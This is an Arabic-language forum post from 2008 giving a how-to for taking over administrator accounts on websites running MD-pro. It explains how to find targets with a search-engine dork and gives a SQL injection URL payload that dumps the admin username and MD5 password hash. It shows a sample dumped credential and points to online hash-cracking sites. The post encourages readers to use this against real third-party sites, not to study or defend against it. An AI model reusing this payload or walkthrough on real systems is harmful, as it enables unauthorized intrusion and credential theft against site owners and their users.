عرض مشاركة واحدة
قديم 08-23-2008, 02:23 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
PiNki
 
الصورة الرمزية PiNki
 

 

 
إحصائية العضو





PiNki غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
PiNki is on a distinguished road

Thumbs down الان أدخل كأدمن على مواقع "powered by MD-pro "


السلام عليكم

هناك طريقه سهله جدا للدخول
كأدمن في المواقع...



1-الخطوة الأولى : نذهب إلى google,yahoo و نضع
كود PHP:
"powered by md-pro"
ثم بحث.




2-الخطوة الثانية : إختر موقعا "يجب البحث على الموقع المناسب و هناك العديد"
كيف نعرف أن هذا الموقع مناسب?
نفتح أي موقع و نضيف هذه العبارة :


كود PHP:
/index.php?module=Topics&func=view&topicid=-1 UNION ALL SELECT null,null,concat(pn_uname,0x3a,pn_pass),null,null, null,null from md_users where pn_uid=2/*


و يجب الحصول على مثل هذه النتيجة



.و كما ترون
.admin=stefan
7aa9f13ab4cb39975b22d7d9cbe456fa=password
هناك العديد من الطرق لفك مثل هذه الرموز md5




إضغط هنا


http://gdataonline.com/seekhash.php

او
http://www.milw0rm.com/



الأن لديك كل ما يلزمك لدخول كأدمن!!!


كود:

http://www.[sitename].com/index.php?...iew&topicid=-1 UNION ALL SELECT null,null,concat(pn_uname,0x3a,pn_pass),null,null, null,null from md_users where pn_uid=2/*

والثغرة sql injection



بالموفقيه اخواااني ..




hghk H]og ;H]lk ugn l,hru "powered by MD-pro "

   

رد مع اقتباس